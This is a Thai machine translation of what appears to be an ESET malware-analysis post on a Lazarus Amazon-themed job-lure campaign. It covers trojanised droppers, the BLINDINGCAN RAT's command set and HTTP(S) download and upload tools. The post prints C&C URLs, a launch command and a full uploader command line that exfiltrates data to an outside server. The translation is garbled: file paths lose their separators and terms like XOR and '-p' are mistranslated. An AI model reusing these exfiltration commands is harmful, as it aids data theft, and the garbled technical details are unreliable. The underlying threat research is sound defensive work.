แคมเปญธีมอเมซอนของลาซารัสในเนเธอร์แลนด์และเบลเยียม

นักวิจัยของ ESET ค้นพบและวิเคราะห์ชุดเครื่องมือที่เป็นอันตรายซึ่งถูกใช้โดยกลุ่ม Lazarus APT ที่น่าอับอายในการโจมตีในช่วงฤดูใบไม้ร่วงปี 2021 แคมเปญเริ่มต้นด้วยอีเมลหลอกลวงที่มีเอกสารธีม Amazon ที่เป็นอันตรายและมุ่งเป้าไปที่พนักงานของบริษัทการบินในเนเธอร์แลนด์ และนักข่าวการเมืองในเบลเยียม เป้าหมายหลักของผู้โจมตีคือการขโมยข้อมูล Lazarus (หรือที่รู้จักในชื่อ HIDDEN COBRA) เริ่มดำเนินการมาตั้งแต่ปี 2009 เป็นอย่างน้อย โดยมีหน้าที่รับผิดชอบต่อเหตุการณ์ที่มีรายละเอียดสูง เช่น ทั้ง แฮ็ค Sony Pictures Entertainment และหลายสิบล้านดอลลาร์ cyberheists ใน 2016ที่ WannaCryptor (aka WannaCry) ระบาดในปี 2017 และประวัติการโจมตีที่ก่อกวนมาอย่างยาวนาน โครงสร้างพื้นฐานสาธารณะและที่สำคัญของเกาหลีใต้ อย่างน้อยตั้งแต่ปี 2011

เป้าหมายทั้งสองได้รับข้อเสนองาน พนักงานในเนเธอร์แลนด์ได้รับไฟล์แนบผ่านการส่งข้อความของ LinkedIn และบุคคลในเบลเยียมได้รับเอกสารทางอีเมล การโจมตีเริ่มต้นหลังจากเปิดเอกสารเหล่านี้ ผู้โจมตีได้ปรับใช้เครื่องมือที่เป็นอันตรายหลายอย่างในแต่ละระบบ รวมถึงดรอปเพอร์ ตัวโหลด แบ็คดอร์ HTTP(S) ที่มีคุณสมบัติครบถ้วน ตัวอัปโหลด HTTP(S) และตัวดาวน์โหลด ความคล้ายคลึงกันระหว่าง droppers คือมันเป็นโปรเจ็กต์โอเพ่นซอร์สที่ถูกโทรจันซึ่งถอดรหัสเพย์โหลดที่ฝังตัวโดยใช้รหัสบล็อกที่ทันสมัยพร้อมคีย์ยาวที่ส่งผ่านเป็นอาร์กิวเมนต์บรรทัดคำสั่ง ในหลายกรณี ไฟล์ที่เป็นอันตรายคือส่วนประกอบ DLL ที่ถูกโหลดโดย EXE ที่ถูกต้อง แต่มาจากตำแหน่งที่ผิดปกติในระบบไฟล์

เครื่องมือที่โดดเด่นที่สุดโดยผู้โจมตีคือโมดูลโหมดผู้ใช้ที่ได้รับความสามารถในการอ่านและเขียนหน่วยความจำเคอร์เนลเนื่องจาก CVE-2021-21551 ช่องโหว่ในไดรเวอร์ของ Dell ที่ถูกกฎหมาย นี่เป็นครั้งแรกที่เคยบันทึกการละเมิดช่องโหว่นี้ในป่า จากนั้นผู้โจมตีใช้การเข้าถึงเพื่อเขียนหน่วยความจำเคอร์เนลเพื่อปิดใช้งานกลไกทั้งเจ็ดที่ระบบปฏิบัติการ Windows เสนอให้ตรวจสอบการทำงานของมัน เช่น รีจิสทรี ระบบไฟล์ การสร้างกระบวนการ การติดตามเหตุการณ์ ฯลฯ โดยพื้นฐานแล้วจะทำให้โซลูชันการรักษาความปลอดภัยปิดบังด้วยวิธีทั่วไปและมีประสิทธิภาพ

ในบล็อกโพสต์นี้ เราจะอธิบายบริบทของแคมเปญและให้การวิเคราะห์ทางเทคนิคโดยละเอียดขององค์ประกอบทั้งหมด งานวิจัยชิ้นนี้นำเสนอที่งาน การประชุมข่าวไวรัส. เนื่องจากความเป็นต้นฉบับ จุดเน้นหลักของการนำเสนอจึงอยู่ที่องค์ประกอบที่เป็นอันตรายที่ใช้ในการโจมตีนี้ซึ่งใช้เทคนิค Bring Your Own Vulnerable Driver (BYOVD) และใช้ประโยชน์จากช่องโหว่ CVE-2021-21551 ดังกล่าว ข้อมูลรายละเอียดอยู่ในเอกสารไวท์เปเปอร์ Lazarus & BYOVD: ความชั่วร้ายสู่แกน Windows.

เราถือว่าการโจมตีเหล่านี้มาจากลาซารัสด้วยความมั่นใจสูง โดยพิจารณาจากโมดูลเฉพาะ ใบรับรองการเซ็นโค้ด และวิธีการบุกรุกที่เหมือนกันกับแคมเปญก่อนหน้าของลาซารัส เช่น การดำเนินการใน (ter) การรับ  และ ปฏิบัติการดรีมจ๊อบ. ความหลากหลาย จำนวน และความเบี้ยวในการดำเนินการของแคมเปญลาซารัสกำหนดกลุ่มนี้ เช่นเดียวกับที่ดำเนินการทั้งสามเสาหลักของกิจกรรมอาชญากรไซเบอร์: การจารกรรมทางอินเทอร์เน็ต การก่อวินาศกรรมทางอินเทอร์เน็ต และการแสวงหาผลประโยชน์ทางการเงิน

การเข้าถึงเบื้องต้น

นักวิจัยของ ESET ค้นพบการโจมตีใหม่สองครั้ง: การโจมตีครั้งแรกกับบุคลากรของสื่อในเบลเยียม และอีกหนึ่งการโจมตีกับพนักงานของบริษัทการบินและอวกาศในเนเธอร์แลนด์

ในประเทศเนเธอร์แลนด์ การโจมตีส่งผลกระทบต่อคอมพิวเตอร์ Windows 10 ที่เชื่อมต่อกับเครือข่ายองค์กร ซึ่งพนักงานได้รับการติดต่อผ่าน LinkedIn Messaging เกี่ยวกับงานใหม่ที่อาจเกิดขึ้น ส่งผลให้มีการส่งอีเมลพร้อมเอกสารแนบ เราได้ติดต่อผู้ปฏิบัติงานด้านความปลอดภัยของบริษัทที่ได้รับผลกระทบ ซึ่งสามารถแบ่งปันเอกสารที่เป็นอันตรายกับเราได้ ไฟล์ Word Amzon_เนเธอร์แลนด์.docx ส่งไปยังเป้าหมายเป็นเพียงเอกสารเค้าร่างที่มีโลโก้ Amazon (ดูรูปที่ 1) เมื่อเปิดเทมเพลตระยะไกล https://thetalkingcanvas[.]com/thetalking/globalcareers/us/5/careers/jobinfo.php?image=_ดีโอ.โปรเจ (ในกรณีที่ เป็นตัวเลขเจ็ดหลัก) ถูกดึงออกมา เราไม่สามารถรับเนื้อหาได้ แต่เราคิดว่าอาจมีข้อเสนองานสำหรับโครงการอวกาศอเมซอน โครงการไคเปอร์. นี่เป็นวิธีที่ลาซารัสฝึกฝนใน การดำเนินการใน (ter) การรับ และ ปฏิบัติการดรีมจ๊อบ แคมเปญที่กำหนดเป้าหมายอุตสาหกรรมการบินและอวกาศและการป้องกันประเทศ

ภายในไม่กี่ชั่วโมง เครื่องมือที่เป็นอันตรายหลายอย่างถูกส่งไปยังระบบ รวมถึงดรอปเพอร์ ตัวโหลด แบ็คดอร์ HTTP(S) ที่มีคุณสมบัติครบถ้วน ตัวอัปโหลด HTTP(S) และตัวดาวน์โหลด HTTP(S) ดูส่วนชุดเครื่องมือ

เกี่ยวกับการโจมตีในเบลเยียม พนักงานของบริษัทสื่อสารมวลชน (ซึ่งมีที่อยู่อีเมลที่เปิดเผยต่อสาธารณะบนเว็บไซต์ของบริษัท) ได้รับการติดต่อผ่านข้อความอีเมลพร้อมข้อความหลอกลวง AWS_EMEA_Legal_.docx ที่แนบมา. เนื่องจากเราไม่ได้รับเอกสาร เราจึงรู้เพียงชื่อเอกสารนั้น ซึ่งบ่งชี้ว่าอาจมีการเสนองานในตำแหน่งทางกฎหมาย หลังจากเปิดเอกสาร การโจมตีก็เกิดขึ้น แต่ผลิตภัณฑ์ของ ESET หยุดลงทันที โดยมีไฟล์ปฏิบัติการที่เป็นอันตรายเพียงไฟล์เดียวที่เกี่ยวข้อง สิ่งที่น่าสนใจในที่นี้คือ ในขณะนั้น ระบบไบนารีนี้ได้รับการลงนามอย่างถูกต้องด้วยใบรับรองการเซ็นโค้ด

การแสดงที่มา

เราถือว่าการโจมตีทั้งสองเกิดจากกลุ่มลาซารัสด้วยความมั่นใจในระดับสูง ขึ้นอยู่กับปัจจัยต่อไปนี้ ซึ่งแสดงความสัมพันธ์กับแคมเปญ Lazarus อื่นๆ:

1. มัลแวร์ (ชุดการบุกรุก):
   1. แบ็คดอร์ HTTPS (SHA‑1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2) มีความคล้ายคลึงอย่างมากกับแบ็คดอร์ BLINDINGCAN รายงานโดย CISA (US-CERT)และเกิดจาก HIDDEN COBRA ซึ่งเป็นชื่อรหัสของลาซารัส
   2. เครื่องมืออัปโหลด HTTP(S) มีความคล้ายคลึงกันอย่างมากกับเครื่องมือ C:ProgramDataIBM~DF234.TMP กล่าวถึงใน รายงานโดย HvS Consulting, หมวด 2.10 การคัดแยก.
   3. เส้นทางและชื่อไฟล์แบบเต็ม %ALLUSERSPROFILE%AdobeAdobe.tmpเหมือนกับที่ Kaspersky รายงานเมื่อเดือนกุมภาพันธ์ พ.ศ. 2021 ในเอกสารไวท์เปเปอร์เกี่ยวกับ Lazarus's เข็มปฏิบัติการภัยคุกคามซึ่งมุ่งเป้าไปที่อุตสาหกรรมการป้องกันประเทศ
   4. ใบรับรองการลงนามรหัสซึ่งออกให้บริษัทสหรัฐอเมริกา “เอ” สำนักงานแพทย์ PLLC และเคยเซ็นชื่อหนึ่งหยด มีรายงานด้วยใน การรณรงค์ต่อต้านนักวิจัยด้านความปลอดภัย; ดูเพิ่มเติมที่ กลุ่มลาซารัส: 2 แคมเปญ TOY GUYS รายงานภัยคุกคามของ ESET 2021 T1, หน้า 11
   5. มีการใช้การเข้ารหัสประเภทที่ผิดปกติในเครื่องมือของแคมเปญ Lazarus นี้: HC-128 รหัสลับอื่น ๆ ที่ Lazarus ใช้น้อยกว่าในอดีต: ตัวแปร Spritz ของ RC4 in หลุมรดน้ำโจมตีธนาคารโปแลนด์และเม็กซิโก; ต่อมาลาซารัสใช้ RC4 ที่ดัดแปลงแล้วใน การดำเนินการใน (ter) การรับ; ใช้รหัสสตรีม A5/1 ที่แก้ไขแล้วใน WIZVERA VeraPort โจมตีห่วงโซ่อุปทาน.
2. โครงสร้างพื้นฐาน:
   1. สำหรับเซิร์ฟเวอร์ C&C ระดับแรก ผู้โจมตีไม่ได้ใช้เซิร์ฟเวอร์ของตนเอง แต่จะแฮ็กเซิร์ฟเวอร์ที่มีอยู่แทน นี่เป็นพฤติกรรมปกติของลาซารัสแต่ยังขาดความมั่นใจ

toolset

ลักษณะทั่วไปอย่างหนึ่งของลาซารัสคือการส่งมอบน้ำหนักบรรทุกขั้นสุดท้ายในรูปแบบของลำดับสองหรือสามขั้นตอน มันเริ่มต้นด้วยหยด - โดยปกติแล้วจะเป็นแอปพลิเคชั่นโอเพ่นซอร์สที่ถูกโทรจัน - ที่ถอดรหัสเพย์โหลดที่ฝังตัวด้วยรหัสบล็อกที่ทันสมัยเช่น AES-128 (ซึ่งไม่ใช่เรื่องผิดปกติสำหรับ Lazarus เช่น รหัสหนังสือปฏิบัติการหรือ XOR ที่สับสน หลังจากแยกวิเคราะห์อาร์กิวเมนต์บรรทัดคำสั่งสำหรับคีย์ที่รัดกุม แม้ว่าเพย์โหลดที่ฝังไว้จะไม่ถูกทิ้งลงบนระบบไฟล์แต่โหลดโดยตรงในหน่วยความจำและดำเนินการ แต่เราระบุมัลแวร์ดังกล่าวเป็นหยด มัลแวร์ที่ไม่มีบัฟเฟอร์ที่เข้ารหัส แต่ที่โหลดเพย์โหลดจากระบบไฟล์ เราแสดงว่าเป็นตัวโหลด

ตัวหยดอาจ (ตารางที่ 1) หรืออาจไม่ (ตารางที่ 2) ถูกโหลดด้านข้างโดยกระบวนการที่ถูกต้องตามกฎหมาย (Microsoft) ในกรณีแรกที่นี่ แอปพลิเคชันที่ถูกต้องอยู่ในตำแหน่งที่ผิดปกติ และส่วนประกอบที่เป็นอันตรายจะมีชื่อของ DLL ที่เกี่ยวข้องซึ่งอยู่ในการนำเข้าของแอปพลิเคชัน ตัวอย่างเช่น DLL . ที่เป็นอันตราย colui.dll ถูกโหลดโดยแอปพลิเคชันระบบที่ถูกต้อง Color Control Panel (colorcpl.exe) ทั้งสองแห่งตั้งอยู่ที่ C:โปรแกรมข้อมูลPTC. อย่างไรก็ตาม ตำแหน่งปกติสำหรับแอปพลิเคชันที่ถูกกฎหมายนี้คือ %WINDOWS%ระบบ32.

ในทุกกรณี อาร์กิวเมนต์บรรทัดคำสั่งอย่างน้อยหนึ่งอาร์กิวเมนต์จะถูกส่งระหว่างรันไทม์ซึ่งทำหน้าที่เป็นพารามิเตอร์ภายนอกที่จำเป็นในการถอดรหัสเพย์โหลดที่ฝังไว้ ใช้อัลกอริธึมถอดรหัสต่างๆ ดูคอลัมน์สุดท้ายในตารางที่ 1 และตารางที่ 2 ในหลายกรณีเมื่อใช้ AES-128 ยังมีพารามิเตอร์แบบฮาร์ดโค้ดภายในร่วมกับชื่อของกระบวนการหลักและชื่อ DLL ของกระบวนการ ซึ่งทั้งหมดนี้จำเป็นสำหรับการถอดรหัสที่สำเร็จ

ตารางที่ 1. DLL ที่เป็นอันตรายไซด์โหลดโดยกระบวนการที่ถูกต้องจากตำแหน่งที่ผิดปกติ

โฟลเดอร์ตำแหน่ง	กระบวนการผู้ปกครองที่ถูกต้องตามกฎหมาย	DLL . ไซด์โหลดที่เป็นอันตราย	โครงการโทรจัน	พารามิเตอร์ภายนอก	อัลกอริทึมการถอดรหัส
C:โปรแกรมข้อมูลPTC	colorcpl.exe	colorui.dll	libcrypto ของ LibreSSL 2.6.5	BE93E050D9C0EAEB1F0E6AE13C1595B5 (โหลด BLINDINGCAN)	แฮคเกอร์
C:WindowsVss	WFS.exe	crui.dll	Gonpp v1.2.0.0 (ปลั๊กอิน Notepad++)	A39T8kcfkXymmAcq (โหลดตัวโหลดกลาง)	AES-128
C:ความปลอดภัยของ Windows	WFS.exe	crui.dll	FingerText 0.56.1 (ปลั๊กอิน Notepad++)	N / A	AES-128
C:ProgramDataCapyon	wsmprovhost.exe	mi.dll	lecui 1.0.0 อัลฟา 10	N / A	AES-128
C:WindowsMicrosoft.NETFramework64v4.0.30319	SMSvcHost.exe	cryptsp.dll	lecui 1.0.0 อัลฟา 10	N / A	AES-128

ตารางที่ 2. มัลแวร์อื่นๆ ที่เกี่ยวข้องกับการโจมตี

โฟลเดอร์ตำแหน่ง	มัลแวร์	โครงการโทรจัน	พารามิเตอร์ภายนอก	อัลกอริทึมการถอดรหัส
C: แคชสาธารณะ	msdxm.ocx	libcre 8.44	93E41C6E20911B9B36BC (โหลดตัวดาวน์โหลด HTTP(S))	แฮคเกอร์
C:โปรแกรมข้อมูลAdobe	อะโดบี.tmp	SQLite3.31.1	S0RMM‑50QQE‑F65DN‑DCPYN‑5QEQA (โหลดตัวอัปเดต HTTP(S))	แฮคเกอร์
C: แคชสาธารณะ	msdxm.ocx	sslดมกลิ่น	หายไป	HC-128

หลังจากการถอดรหัสสำเร็จ บัฟเฟอร์จะถูกตรวจสอบสำหรับรูปแบบ PE ที่เหมาะสม และการดำเนินการจะถูกส่งต่อ ขั้นตอนนี้สามารถพบได้ใน droppers และ loaders ส่วนใหญ่ จุดเริ่มต้นสามารถเห็นได้ในรูปที่ 2

แบ็คดอร์ HTTP(S): BLINDINGCAN

เราระบุแบ็คดอร์ HTTP(S) ที่มีคุณลักษณะครบถ้วน ซึ่งเรียกว่า RAT ที่รู้จักกันในชื่อ BLINDINGCAN ซึ่งใช้ในการโจมตี

dropper ของเพย์โหลดนี้ถูกดำเนินการเป็น %ALLUSERSPROFILE%PTCcolorui.dll; ดูตารางที่ 1 สำหรับรายละเอียด เพย์โหลดถูกแยกและถอดรหัสโดยใช้ XOR ธรรมดา แต่มีคีย์ยาว ซึ่งเป็นสตริงที่สร้างโดยการต่อชื่อของโปรเซสพาเรนต์ เป็นชื่อไฟล์ของตัวเอง และพารามิเตอร์บรรทัดคำสั่งภายนอก - ที่นี่ COLORCPL.EXECOLORUI.DLLBE93E050D9C0EAEB1F0E6AE13C1595B5.

เพย์โหลด SHA-1: 735B7E9DFA7AF03B751075FD6D3DE45FBF0330A2เป็น VMProtect-ed DLL แบบ 64 บิต มีการเชื่อมต่อกับสถานที่ห่างไกลแห่งหนึ่ง https://aquaprographix[.]com/patterns/Map/maps.php or https://turnscor[.]com/wp-includes/feedback.php. ภายในโค้ดเสมือนจริง เราได้เปลี่ยนผ่านสิ่งประดิษฐ์ RTTI เฉพาะเจาะจงต่อไปนี้ที่พบในไฟล์เรียกทำงาน: .?AVCHTTP_Protocol@@, .?AVCHTTP_Protocol@@, .?AVCHTTP_Protocol@@, .?AVCFileRW@@". ยิ่งไปกว่านั้น มีความคล้ายคลึงกันในระดับโค้ด เนื่องจากดัชนีของคำสั่งเริ่มต้นด้วยค่าเดียวกัน 8201; ดูรูปที่ 3 สิ่งนี้ช่วยให้เราสามารถระบุหนูตัวนี้ว่าเป็น BLINDINGCAN (SHA-1: 5F4FBD57319BD0D2DF31131E864FDDA9590A652D) รายงานครั้งแรกโดย ซีไอเอสเอ. เวอร์ชันล่าสุดของเพย์โหลดนี้ถูกพบในแคมเปญอื่นในธีม Amazon โดยที่ BLINDINGCAN ถูกทิ้งโดยไคลเอนต์ Putty-0.77 ที่ถูกโทรจัน: ดูบล็อกของ Mandiant

จากจำนวนรหัสคำสั่งที่ผู้ปฏิบัติงานสามารถใช้ได้ มีความเป็นไปได้ที่ตัวควบคุมฝั่งเซิร์ฟเวอร์จะพร้อมใช้งาน ซึ่งผู้ปฏิบัติงานสามารถควบคุมและสำรวจระบบที่ถูกบุกรุกได้ การดำเนินการภายในตัวควบคุมนี้อาจส่งผลให้ ID คำสั่งที่เกี่ยวข้องและพารามิเตอร์ถูกส่งไปยัง RAT ที่ทำงานบนระบบของเป้าหมาย รายการรหัสคำสั่งอยู่ในตารางที่ 3 และเห็นด้วยกับการวิเคราะห์ที่ทำโดย เจพีซีเสิร์ต/ซีซี, ภาคผนวก C. ไม่มีการตรวจสอบความถูกต้องของพารามิเตอร์ เช่น โฟลเดอร์หรือชื่อไฟล์ นั่นหมายความว่าการตรวจสอบทั้งหมดจะต้องดำเนินการบนฝั่งเซิร์ฟเวอร์ ซึ่งแสดงให้เห็นว่าตัวควบคุมฝั่งเซิร์ฟเวอร์เป็นแอปพลิเคชันที่ซับซ้อน ซึ่งมีแนวโน้มว่าจะมี GUI ที่ใช้งานง่าย

ตารางที่ 3 คำสั่งของ RAT

คำสั่ง	รายละเอียด
8201	ส่งข้อมูลระบบ เช่น ชื่อคอมพิวเตอร์ เวอร์ชันของ Windows และโค้ดเพจ
8208	รับแอตทริบิวต์ของไฟล์ทั้งหมดในโฟลเดอร์ RDP ที่แมป (tsclientC และอื่น ๆ )
8209	รับแอตทริบิวต์ของไฟล์ในเครื่องซ้ำ ๆ
8210	ดำเนินการคำสั่งในคอนโซล เก็บเอาต์พุตเป็นไฟล์ชั่วคราว และอัปโหลด
8211	Zip ไฟล์ในโฟลเดอร์ชั่วคราวและอัปโหลด
8212	ดาวน์โหลดไฟล์และอัปเดตข้อมูลเวลา
8214	สร้างกระบวนการใหม่ในคอนโซลและรวบรวมผลลัพธ์
8215	สร้างกระบวนการใหม่ในบริบทความปลอดภัยของผู้ใช้ที่แสดงโดยโทเค็นที่ระบุและรวบรวมผลลัพธ์
8217	สร้างรายการแผนผังกระบวนการซ้ำๆ
8224	ยุติกระบวนการ
8225	ลบไฟล์อย่างปลอดภัย
8226	เปิดใช้งาน nonblocking I/O ผ่านซ็อกเก็ต TCP (ซ็อกเก็ต (AF_INET , SOCK_STREAM , IPPROTO_TCP) ด้วยรหัสควบคุม FIONBIO)
8227	ตั้งค่าไดเร็กทอรีปัจจุบันสำหรับกระบวนการปัจจุบัน
8231	อัปเดตข้อมูลเวลาของไฟล์ที่เลือก
8241	ส่งการกำหนดค่าปัจจุบันไปยังเซิร์ฟเวอร์ C&C
8242	อัปเดตการกำหนดค่า
8243	แสดงรายการโครงสร้างไดเร็กทอรีซ้ำ ๆ
8244	รับประเภทและพื้นที่ว่างในดิสก์ของไดรฟ์
8249	ดำเนินการต่อด้วยคำสั่งถัดไป
8256	ขอคำสั่งอื่นจากเซิร์ฟเวอร์ C&C
8262	เขียนไฟล์ใหม่โดยไม่เปลี่ยนเวลาเขียนล่าสุด
8264	คัดลอกไฟล์ไปยังปลายทางอื่น
8265	ย้ายไฟล์ไปยังปลายทางอื่น
8272	ลบไฟล์
8278	ถ่ายภาพหน้าจอ

รถตักระดับกลาง

ตอนนี้เราอธิบายห่วงโซ่สามขั้นตอนซึ่งน่าเสียดายที่เราสามารถระบุได้เฉพาะสองขั้นตอนแรกเท่านั้น: หยดและตัวโหลดระดับกลาง

ขั้นตอนแรกคือหยดที่อยู่ที่ C:WindowsVsscredui.dll และถูกเรียกใช้ผ่านแอปพลิเคชันที่ถูกกฎหมาย – แต่เสี่ยงต่อการจี้แจ็กคำสั่งค้นหา DLL – แอปพลิเคชันที่มีพารามิเตอร์ (ภายนอก) C:WindowsVssWFS.exe A39T8kcfkXymmAcq. โปรแกรม WFS.exe เป็นสำเนาของแอปพลิเคชัน Windows Fax and Scan แต่ตำแหน่งมาตรฐานคือ %WINDOWS%ระบบ32.

หยดเป็นโทรจัน ปลั๊กอิน Gonpp สำหรับ Notepad++ เขียนด้วยภาษาโปรแกรม Go หลังจากการถอดรหัส ดรอปเปอร์จะตรวจสอบว่าบัฟเฟอร์เป็นไฟล์เรียกทำงาน 64 บิตที่ถูกต้องหรือไม่ จากนั้นหากใช่ ให้โหลดลงในหน่วยความจำ เพื่อให้สเตจที่สองพร้อมสำหรับการดำเนินการ

เป้าหมายของขั้นกลางนี้คือการโหลดเพย์โหลดเพิ่มเติมในหน่วยความจำและดำเนินการ มันทำงานนี้ในสองขั้นตอน อันดับแรกจะอ่านและถอดรหัสไฟล์การกำหนดค่า C:windowsSystem32wlansvc.cplซึ่งไม่ใช่ตามที่ส่วนขยายอาจแนะนำว่าสามารถเรียกใช้งานได้ (เข้ารหัส) แต่เป็นไฟล์ข้อมูลที่มีชิ้นส่วนของ 14944 ไบต์ที่มีการกำหนดค่า เราไม่มีข้อมูลเฉพาะจากการโจมตีในปัจจุบัน อย่างไรก็ตาม เราได้รับการกำหนดค่าดังกล่าวจากการโจมตีอื่นของ Lazarus: ดูรูปที่ 5 การกำหนดค่านี้คาดว่าจะเริ่มต้นด้วยคำสองคำที่แสดงขนาดรวมของบัฟเฟอร์ที่เหลืออยู่ (ดูบรรทัดที่ 69 ในรูปที่ 4 ด้านล่างและตัวแปร u32ขนาดรวม) ตามด้วยอาร์เรย์ของ 14944 โครงสร้างแบบไบต์ยาวที่มีค่าอย่างน้อยสองค่า: ชื่อของโหลด DLL เป็นตัวยึดสำหรับระบุส่วนที่เหลือของการกำหนดค่า (ที่ออฟเซ็ต 168 ของบรรทัด 74 ในรูปที่ 4 และสมาชิกที่ไฮไลต์ในรูปที่ 5)

ขั้นตอนที่สองคือการดำเนินการอ่าน ถอดรหัส และโหลดไฟล์นี้ซึ่งแสดงถึงขั้นตอนที่สามและขั้นตอนสุดท้ายที่มีแนวโน้มสูง คาดว่าจะสามารถเรียกใช้งานได้ 64 บิตและโหลดลงในหน่วยความจำในลักษณะเดียวกับที่ดรอปเปอร์ขั้นแรกจัดการกับตัวโหลดระดับกลาง ที่จุดเริ่มต้นของการดำเนินการ mutex จะถูกสร้างขึ้นเป็นการต่อกันของ string GlobalAppCompatCacheObject และการตรวจสอบ CRC32 ของชื่อ DLL (crui.dll) แสดงเป็นจำนวนเต็มที่ลงนาม ค่าควรเท่ากับ GlobalAppCompatCacheObject-1387282152 if wlansvc.cpl มีอยู่และ -1387282152 มิฉะนั้น.

ข้อเท็จจริงที่น่าสนใจคือการใช้อัลกอริธึมถอดรหัสนี้ (รูปที่ 4, Line 43 & 68) ซึ่งไม่แพร่หลายในชุดเครื่องมือ Lazarus หรือมัลแวร์โดยทั่วไป ค่าคงที่ 0xB7E15163 และ 0x61C88647 (ซึ่งเป็น -0x9E3779B9; ดูรูปที่ 6 บรรทัดที่ 29 & 35) ใน การขยายคีย์ แสดงว่าเป็นอัลกอริธึม RC5 หรือ RC6 เมื่อตรวจสอบลูปการถอดรหัสหลักของอัลกอริธึม เราจะระบุได้ว่า RC6 ทั้งสองมีความซับซ้อนมากกว่า ตัวอย่างของภัยคุกคามที่ซับซ้อนโดยใช้การเข้ารหัสที่ผิดปกติเช่น BananaUsurper ของ Equations Group; ดู รายงานของ Kaspersky จาก 2016

ตัวดาวน์โหลด HTTP(S)

ตัวดาวน์โหลดที่ใช้โปรโตคอล HTTP(S) ถูกส่งไปยังระบบของเป้าหมายด้วย

มันถูกติดตั้งโดยดรอปเปอร์ขั้นแรก (SHA1: 001386CBBC258C3FCC64145C74212A024EAA6657) ซึ่งเป็นโทรจัน libpcre-8.44 ห้องสมุด. มันถูกดำเนินการโดยคำสั่ง

cmd.exe /c เริ่ม /b rundll32.exe C: PublicCachemsdxm.ocx, sCtrl 93E41C6E20911B9B36BC

(พารามิเตอร์คือคีย์ XOR สำหรับการดึงข้อมูลเพย์โหลดที่ฝังไว้ ดูตารางที่ 2) หยดยังบรรลุความคงอยู่โดยการสร้าง OneNoteTray.LNK ไฟล์ที่อยู่ในไฟล์ %APPDATA%MicrosoftWindowsเมนูเริ่มโปรแกรมการเริ่มต้น โฟลเดอร์

ขั้นตอนที่สองคือโมดูล VMProtect แบบ 32 บิตที่สร้างคำขอเชื่อมต่อ HTTP ไปยังเซิร์ฟเวอร์ C&C ที่เก็บไว้ในการกำหนดค่า ดูรูปที่ 7 ใช้ User Agent เดียวกัน – มอซิลลา/5.0 (วินโดวส์ NT 6.1; WOW64) Chrome/28.0.1500.95 ซาฟารี/537.36 - ในฐานะที่เป็น BLINDINGCAN RAT มีสิ่งประดิษฐ์ RTTI .?AVCHTTP_โปรโตคอล@@ แต่ไม่ .?AVCFileRW@@และไม่มีคุณลักษณะเช่นการจับภาพหน้าจอ การเก็บถาวรไฟล์ หรือการรันคำสั่งผ่านบรรทัดคำสั่ง สามารถโหลดโปรแกรมสั่งการไปยังบล็อกหน่วยความจำที่จัดสรรใหม่และผ่านการเรียกใช้โค้ดได้

ตัวอัปโหลด HTTP(S)

เครื่องมือ Lazarus นี้มีหน้าที่ในการกรองข้อมูลโดยใช้โปรโตคอล HTTP หรือ HTTPS

มันถูกจัดส่งในสองขั้นตอนเช่นกัน หยดเริ่มต้นคือโทรจัน sqlite-3.31.1 ห้องสมุด. ตัวอย่าง Lazarus มักจะไม่มีเส้นทาง PDB แต่ตัวโหลดนี้มีหนึ่งเส้นทาง W: เครื่องมือพัฒนา HttpUploaderHttpPOSTPro_BINRUNDLL64sqlite3.pdbซึ่งยังแนะนำการทำงานของมันทันที – HTTP Uploader

ดรอปเปอร์ต้องการพารามิเตอร์บรรทัดคำสั่งหลายตัว: หนึ่งในนั้นคือรหัสผ่านที่จำเป็นในการถอดรหัสและโหลดเพย์โหลดที่ฝังไว้ พารามิเตอร์ที่เหลือจะถูกส่งไปยังเพย์โหลด เราตรวจไม่พบพารามิเตอร์ แต่โชคดีที่เครื่องมือนี้ถูกตรวจพบโดยบังเอิญในการสืบสวนทางนิติเวชโดย ที่ปรึกษา HvS:

C:ProgramDataIBM~DF234.TMP S0RMM-50QQE-F65DN-DCPYN-5QEQA https://www.gonnelli.it/uploads/catalogo/thumbs/thumb.asp C:ProgramDataIBMrestore0031.dat data03 10000 -p 192.168.1.240 8080

พารามิเตอร์แรก S0RMM-50QQE-F65DN-DCPYN-5QEQAทำงานเป็นกุญแจสำหรับรูทีนการถอดรหัสของหยด (เพื่อให้แม่นยำยิ่งขึ้น การทำให้งงงวยถูกดำเนินการก่อน โดยที่บัฟเฟอร์ที่เข้ารหัสคือ XOR-ed โดยมีการคัดลอกเลื่อนไปหนึ่งไบต์ จากนั้นจึงทำการถอดรหัส XOR โดยตามด้วยคีย์) พารามิเตอร์ที่เหลือจะถูกเก็บไว้ในโครงสร้างและส่งต่อไปยังสเตจที่สอง สำหรับคำอธิบายความหมาย ดูตารางที่ 4

ตารางที่ 4. พารามิเตอร์บรรทัดคำสั่งสำหรับ HTTP(S) updater

พารามิเตอร์	ความคุ้มค่า	คำอธิบาย
1	S0RMM-50QQE-F65DN-DCPYN-5QEQA	คีย์ถอดรหัส 29 ไบต์
2	https://	C&C สำหรับการกรองข้อมูล
3	C:ProgramDataIBMrestore0031.dat	ชื่อของไดรฟ์ข้อมูล RAR ในเครื่อง
4	data03	ชื่อของไฟล์เก็บถาวรทางฝั่งเซิร์ฟเวอร์
5	10,000	ขนาดของการแบ่ง RAR (สูงสุด 200,000 kB)
6	N / A	ดัชนีเริ่มต้นของการแยก
7	N / A	ดัชนีสิ้นสุดของการแยก
8	-หน้า 192.168.1.240 8080	สวิตช์ -p
9		ที่อยู่ IP ของพร็อกซี
10		พอร์ตพร็อกซี

ขั้นตอนที่สองคือตัวอัปโหลด HTTP เอง พารามิเตอร์เดียวสำหรับสเตจนี้คือโครงสร้างที่มีเซิร์ฟเวอร์ C&C สำหรับการกรอง, ชื่อไฟล์ของไฟล์เก็บถาวร RAR ในเครื่อง, ชื่อรูทของไฟล์เก็บถาวร RAR บนฝั่งเซิร์ฟเวอร์, ขนาดรวมของ RAR ที่แยกออกเป็นกิโลไบต์, ตัวเลือกเสริม ช่วงของดัชนีแยก และตัวเลือก -p สลับกับพร็อกซี IP ภายในและพอร์ต ดูตารางที่ 4 ตัวอย่างเช่น หากไฟล์เก็บถาวร RAR แบ่งออกเป็น 88 ชิ้น แต่ละอันมีขนาดใหญ่ 10,000 kB ผู้อัปโหลดจะส่งการแยกเหล่านี้และเก็บไว้ในฝั่งเซิร์ฟเวอร์ภายใต้ชื่อ ข้อมูล03.000000.avi, ข้อมูล03.000001.avi, ... , ข้อมูล03.000087.avi. ดูรูปที่ 8 บรรทัดที่ 42 ที่มีการจัดรูปแบบสตริงเหล่านี้

